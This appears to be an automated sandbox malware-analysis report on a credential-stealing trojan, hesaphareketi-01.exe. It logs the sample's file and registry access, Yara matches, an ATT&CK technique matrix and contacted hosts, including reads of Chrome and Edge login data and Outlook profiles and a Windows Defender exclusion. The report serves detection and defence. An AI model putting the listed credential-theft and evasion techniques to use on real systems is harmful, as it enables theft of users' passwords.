            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeQueries volume information: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7636, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services11
            Archive Collected Data
            1
            Ingress Tool Transfer
            1
            Exfiltration Over Alternative Protocol
            Abuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scheduled Task/Job
            11
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory13
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Scheduled Task/Job
            3
            Obfuscated Files or Information
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550346 Sample: hesaphareketi-01.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 48 reallyfreegeoip.org 2->48 50 fp2e7a.wpc.phicdn.net 2->50 52 5 other IPs or domains 2->52 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 68 10 other signatures 2->68 8 hesaphareketi-01.exe 7 2->8         started        12 WvaGpcFVX.exe 5 2->12         started        signatures3 66 Tries to detect the country of the analysis system (by using the IP) 48->66 process4 file5 40 C:\Users\user\AppData\Roaming\WvaGpcFVX.exe, PE32 8->40 dropped 42 C:\Users\...\WvaGpcFVX.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp470C.tmp, XML 8->44 dropped 46 C:\Users\user\...\hesaphareketi-01.exe.log, ASCII 8->46 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 14 MSBuild.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 MSBuild.exe 12->24         started        26 schtasks.exe 12->26         started        28 MSBuild.exe 12->28         started        signatures6 process7 dnsIp8 54 50.31.176.103, 21, 32033, 34028 SERVERCENTRALUS United States 14->54 56 checkip.dyndns.com 193.122.6.168, 56815, 56841, 56843 ORACLE-BMC-31898US United States 14->56 58 reallyfreegeoip.org 188.114.96.3, 443, 56827, 56834 CLOUDFLARENETUS European Union 14->58 78 Loading BitLocker PowerShell Module 18->78 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 38 conhost.exe 26->38         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            hesaphareketi-01.exe39%ReversingLabsWin32.Trojan.Strictor
            hesaphareketi-01.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\WvaGpcFVX.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\WvaGpcFVX.exe39%ReversingLabsWin32.Trojan.Strictor
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://go.h0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      241.42.69.40.in-addr.arpa
                      unknown
                      unknownfalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/173.254.250.80false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.orgMSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
